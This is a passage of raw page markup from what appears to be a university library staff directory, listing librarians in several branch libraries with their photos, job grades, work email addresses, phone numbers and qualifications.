elementor-element-0b89bce elementor-widget elementor-widget-image" data-id="0b89bce" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1576-200x300.jpg" class="attachment-medium size-medium wp-image-1187" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1576-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1576-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1576-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1576-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1576-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1576-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-5754446 elementor-widget elementor-widget-heading" data-id="5754446" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default">MOHD Adnan Baharom</h4> </div> </div> <div class="elementor-element elementor-element-c018453 elementor-widget elementor-widget-heading" data-id="c018453" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head Division (Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-5224ce1 elementor-widget elementor-widget-text-editor" data-id="5224ce1" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>m_adnan@ukm.edu.my<br />03-89215816<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-d82f15a" data-id="d82f15a" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-063c2d4 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="063c2d4" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-3d14089" data-id="3d14089" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-130a345 elementor-widget elementor-widget-heading" data-id="130a345" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">MULTIMEDIA</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-6c6cf61 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="6c6cf61" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-c495c5b" data-id="c495c5b" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-35b1a63" data-id="35b1a63" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-1b4b0e0 elementor-widget elementor-widget-image" data-id="1b4b0e0" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1709-200x300.jpg" class="attachment-medium size-medium wp-image-1165" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1709-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1709-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1709-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1709-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1709-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1709-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-b3a0473 elementor-widget elementor-widget-heading" data-id="b3a0473" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"> Norbaizura Malek</h3> </div> </div> <div class="elementor-element elementor-element-e3107e9 elementor-widget elementor-widget-heading" data-id="e3107e9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Head Division (Senior Librarian) (S44)</span></div> </div> </div> <div class="elementor-element elementor-element-2cb536f elementor-widget elementor-widget-text-editor" data-id="2cb536f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>zura@ukm.edu.my<br />03-89215837<br />MLIS (Victoria University of Wellington NZ)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-d97b2a7" data-id="d97b2a7" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-4a66f19 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="4a66f19" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-6c5ae88" data-id="6c5ae88" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-43a60cc elementor-widget elementor-widget-heading" data-id="43a60cc" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">BRANCH LIBRARIANS</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-d9761db elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="d9761db" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-1d1ce4b" data-id="1d1ce4b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-fae6a47 elementor-widget elementor-widget-heading" data-id="fae6a47" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">THE MALAY WORLD & CIVILIZATION LIBRARY</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-256054d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="256054d" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-052e8b2" data-id="052e8b2" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-4456433" data-id="4456433" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-cb99a04 elementor-widget elementor-widget-image" data-id="cb99a04" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1630-200x300.jpg" class="attachment-medium size-medium wp-image-1180" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1630-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1630-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1630-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1630-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1630-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1630-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-33b92b7 elementor-widget elementor-widget-heading" data-id="33b92b7" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-medium">Hayatul Azlah Ghazali</div> </div> </div> <div class="elementor-element elementor-element-8ac62ce elementor-widget elementor-widget-heading" data-id="8ac62ce" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head (Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-fbca8a8 elementor-widget elementor-widget-text-editor" data-id="fbca8a8" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>hayat@ukm.edu.my<br />03-89215231<br />B.Sc. (Hons) Lib Sc. (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-eb63c6d" data-id="eb63c6d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8ccd7e0 elementor-widget elementor-widget-image" data-id="8ccd7e0" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1556-200x300.jpg" class="attachment-medium size-medium wp-image-1175" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1556-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1556-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1556-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1556-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1556-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1556-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-20c282b elementor-widget elementor-widget-heading" data-id="20c282b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-medium">Muhaimin Sabron</div> </div> </div> <div class="elementor-element elementor-element-823dcbb elementor-widget elementor-widget-heading" data-id="823dcbb" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span style=", sans-serif;font-size: 15.4px;font-style: normal;font-weight: 300">Assistant Chief Librarian</span> (S48)</div> </div> </div> <div class="elementor-element elementor-element-0b53f9d elementor-widget elementor-widget-text-editor" data-id="0b53f9d" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">muhaimin@ukm.edu.my</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">03-89213709</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">MLIS (UM)</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">B.Sc. (Hons) Information Studies (UiTM)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-9b140e2" data-id="9b140e2" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-112f6a1 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="112f6a1" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-cddd8f5" data-id="cddd8f5" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-dbd2840 elementor-widget elementor-widget-heading" data-id="dbd2840" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">LAW LIBRARY</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-081f673 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="081f673" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-dd1922d" data-id="dd1922d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-1b858d1 elementor-widget elementor-widget-image" data-id="1b858d1" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="187" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1531-187x300.jpg" class="attachment-medium size-medium wp-image-1170" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1531-187x300.jpg 187w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1531-639x1024.jpg 639w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1531-768x1230.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1531-959x1536.jpg 959w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1531-1279x2048.jpg 1279w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1531-scaled.jpg 1598w" sizes="(max-width: 187px) 100vw, 187px" /> </div> </div> <div class="elementor-element elementor-element-c3ab860 elementor-widget elementor-widget-heading" data-id="c3ab860" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default">Shaizimah Badzri</h4> </div> </div> <div class="elementor-element elementor-element-cc70d82 elementor-widget elementor-widget-heading" data-id="cc70d82" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head (<span style=", sans-serif;font-size: 15.4px;font-style: normal;font-weight: 300">Deputy Chief Librarian</span>) (S52)</div> </div> </div> <div class="elementor-element elementor-element-3385487 elementor-widget elementor-widget-text-editor" data-id="3385487" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>shai@ukm.edu.my<br />03-89216390<br />MLIS (UM) <br />B.Sc. (Hons) Library Science (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-7f09dfa" data-id="7f09dfa" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-d6bfa15 elementor-widget elementor-widget-image" data-id="d6bfa15" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1733-200x300.jpg" class="attachment-medium size-medium wp-image-1195" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1733-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1733-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1733-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1733-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1733-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1733-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-c2261cd elementor-widget elementor-widget-heading" data-id="c2261cd" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Rusiah Husin</h3> </div> </div> <div class="elementor-element elementor-element-f1a463c elementor-widget elementor-widget-heading" data-id="f1a463c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-04e9b06 elementor-widget elementor-widget-text-editor" data-id="04e9b06" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>rusiah@ukm.edu.my<br />03-89216391<br />MLIS (UM )<br />BA (Hons) Communication & Malay Literature (UKM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-8c1120a" data-id="8c1120a" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-049652d elementor-widget elementor-widget-image" data-id="049652d" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2858-crop-200x300.jpg" class="attachment-medium size-medium wp-image-8496" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2858-crop-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2858-crop-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2858-crop-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2858-crop-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2858-crop-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2858-crop-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-ecf5563 elementor-widget elementor-widget-heading" data-id="ecf5563" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">NUR MIFTAH JANNAH ROHAIMI<br></h3> </div> </div> <div class="elementor-element elementor-element-bbd9405 elementor-widget elementor-widget-heading" data-id="bbd9405" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-049830a elementor-widget elementor-widget-text-editor" data-id="049830a" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><a role="link" href="mailto:miftahjannah@ukm.edu.my" data-wahfont="14">miftahjannah@ukm.edu.my 聽 聽</a>03-89216956<br />M.Sc. Info. Management (UiTM)<br />B.Sc. (Hons) Information Library Management (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-559c62c" data-id="559c62c" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8714aef elementor-widget elementor-widget-image" data-id="8714aef" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1498-200x300.jpg" class="attachment-medium size-medium wp-image-1205" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1498-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1498-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1498-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1498-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1498-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1498-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-004023a elementor-widget elementor-widget-heading" data-id="004023a" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Mohd Zohdi Haron </h3> </div> </div> <div class="elementor-element elementor-element-e61b6cc elementor-widget elementor-widget-heading" data-id="e61b6cc" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant Engineer (JA29)</div> </div> </div> <div class="elementor-element elementor-element-15b929e elementor-widget elementor-widget-text-editor" data-id="15b929e" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>zohdi@ukm.edu.my<br />03-89216393</p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-b614543 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="b614543" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-3692dfc" data-id="3692dfc" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-de22c2b elementor-widget elementor-widget-heading" data-id="de22c2b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">SECOND CLUSTER LIBRARY</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-9cf1fec elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="9cf1fec" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-ce559eb" data-id="ce559eb" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5b0561a elementor-widget elementor-widget-image" data-id="5b0561a" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1745-200x300.jpg" class="attachment-medium size-medium wp-image-1182" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1745-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1745-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1745-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1745-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1745-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1745-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-06febd2 elementor-widget elementor-widget-heading" data-id="06febd2" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-medium">Nor Asiah Mohamad</div> </div> </div> <div class="elementor-element elementor-element-7e5e8c4 elementor-widget elementor-widget-heading" data-id="7e5e8c4" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head <span>(Assistant Chief Librarian)</span> (S48)</div> </div> </div> <div class="elementor-element elementor-element-84d621f elementor-widget elementor-widget-text-editor" data-id="84d621f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>nor@ukm.edu.my<br />03-89118476<br />MLIS (UM)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-a9033be" data-id="a9033be" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-bcab55e elementor-widget elementor-widget-image" data-id="bcab55e" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1608-200x300.jpg" class="attachment-medium size-medium wp-image-1163" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1608-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1608-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1608-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1608-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1608-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1608-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-ee6701f elementor-widget elementor-widget-heading" data-id="ee6701f" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Jamain Manap</h3> </div> </div> <div class="elementor-element elementor-element-4c20aa3 elementor-widget elementor-widget-heading" data-id="4c20aa3" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-1401236 elementor-widget elementor-widget-text-editor" data-id="1401236" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>jamain@ukm.edu.my<br />03-89118260<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-c06e2fc" data-id="c06e2fc" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-33013a4 elementor-widget elementor-widget-image" data-id="33013a4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1964-200x300.jpg" class="attachment-medium size-medium wp-image-5420" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1964-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1964-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1964-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1964-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1964-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1964-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-28aaf7b elementor-widget elementor-widget-heading" data-id="28aaf7b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">ZAINATUL SA`YAH ZAINON</h3> </div> </div> <div class="elementor-element elementor-element-52935a9 elementor-widget elementor-widget-heading" data-id="52935a9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant Librarian (S29)</div> </div> </div> <div class="elementor-element elementor-element-ee14b12 elementor-widget elementor-widget-text-editor" data-id="ee14b12" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><a href="mailto:zainatul@ukm.edu.my">zainatul@ukm.edu.my</a><br />03-89118474<br /><br /></p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-086f0cc elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="086f0cc" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-bfdf38c" data-id="bfdf38c" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-2c02b93 elementor-widget elementor-widget-heading" data-id="2c02b93" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">DR. ABDUL LATIFF LIBRARY</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-d37298b elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="d37298b" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-f074e6b" data-id="f074e6b" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-c84b31c" data-id="c84b31c" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c15404d elementor-widget elementor-widget-image" data-id="c15404d" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1739-200x300.jpg" class="attachment-medium size-medium wp-image-1196" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1739-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1739-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1739-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1739-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1739-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1739-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-175d6a3 elementor-widget elementor-widget-heading" data-id="175d6a3" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-medium">Mariati Embong</div> </div> </div> <div class="elementor-element elementor-element-4db4ed3 elementor-widget elementor-widget-heading" 